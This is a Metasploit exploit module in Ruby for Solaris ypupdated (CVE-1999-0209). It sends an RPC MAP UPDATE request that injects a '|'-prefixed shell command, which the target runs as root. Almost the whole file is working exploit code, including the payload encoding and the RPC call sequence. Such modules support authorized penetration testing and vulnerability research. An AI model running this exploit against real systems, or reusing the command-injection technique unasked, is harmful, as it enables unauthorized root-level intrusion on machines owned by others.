Path: blob/master/modules/exploits/solaris/sunrpc/ypupdated_exec.rb
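##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'English'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::SunRPC

  # RPC program number of ypupdated, plus the program version and procedure
  # number this module calls (the MAP UPDATE request described below).
  RPC_PROGRAM = 100028
  RPC_VERSION = 1
  RPC_PROCEDURE = 1

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Solaris ypupdated Command Execution',
        'Description' => %q{
          This exploit targets a weakness in the way the ypupdated RPC
          application uses the command shell when handling a MAP UPDATE
          request. Extra commands may be launched through this command
          shell, which runs as root on the remote host, by passing
          commands in the format '|<command>'.

          Vulnerable systems include Solaris 2.7, 8, 9, and 10, when
          ypupdated is started with the '-i' command-line option.
        },
        'Author' => [ 'I)ruid <druid[at]caughq.org>' ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '1999-0209'],
          ['OSVDB', '11517'],
          ['BID', '1749'],
        ],
        'Privileged' => true,
        'Platform' => %w[solaris unix],
        'Arch' => ARCH_CMD,
        'Payload' => {
          'Space' => 1024,
          'DisableNops' => true,
          'Compat' => {
            'PayloadType' => 'cmd',
            'RequiredCmd' => 'generic perl telnet'
          }
        },
        'Targets' => [ ['Automatic', {}], ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '1994-12-12',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )

    register_options([
      OptString.new('HOSTNAME', [false, 'Remote hostname', 'localhost']),
      OptInt.new('GID', [false, 'GID to emulate', 0]),
      OptInt.new('UID', [false, 'UID to emulate', 0])
    ])
  end

  # Runs the exploit: locates ypupdated through the portmapper, sends one
  # AUTH_UNIX-authenticated MAP UPDATE request carrying the payload, and tears
  # the RPC connection down.
  #
  # The request is issued as a blind call: the module reports success when the
  # call returns without an RPC timeout, not when the payload is confirmed to
  # have run. An RPC timeout is reported as a warning rather than an error,
  # matching the original module's behaviour.
  #
  # @return [void]
  def exploit
    hostname = datastore['HOSTNAME']

    print_status('Sending PortMap request for ypupdated program')
    sunrpc_create('udp', RPC_PROGRAM, RPC_VERSION)

    print_status("Sending MAP UPDATE request with command '#{payload.encoded}'")
    print_status('Waiting for response...')
    sunrpc_authunix(hostname, datastore['UID'], datastore['GID'], [])

    # ypupdated hands the map-update argument to a command shell; the leading
    # '|' is the delimiter the Description refers to ('|<command>').
    command = '|' + payload.encoded
    # NOTE(review): the four trailing XDR fields are carried over verbatim from
    # the original module; their meaning within the MAP UPDATE request is not
    # documented here.
    msg = Rex::Encoder::XDR.encode(command, 2, 0x78000000, 2, 0x78000000)
    sunrpc_call(RPC_PROCEDURE, msg)

    sunrpc_destroy

    print_status('No Errors, appears to have succeeded!')
  rescue ::Rex::Proto::SunRPC::RPCTimeout => e
    # Interpolate the exception instead of concatenating it: `String#+` with an
    # exception object raises TypeError, so the original handler crashed inside
    # its own rescue clause.
    print_warning("Warning: #{e.message}")
  end
end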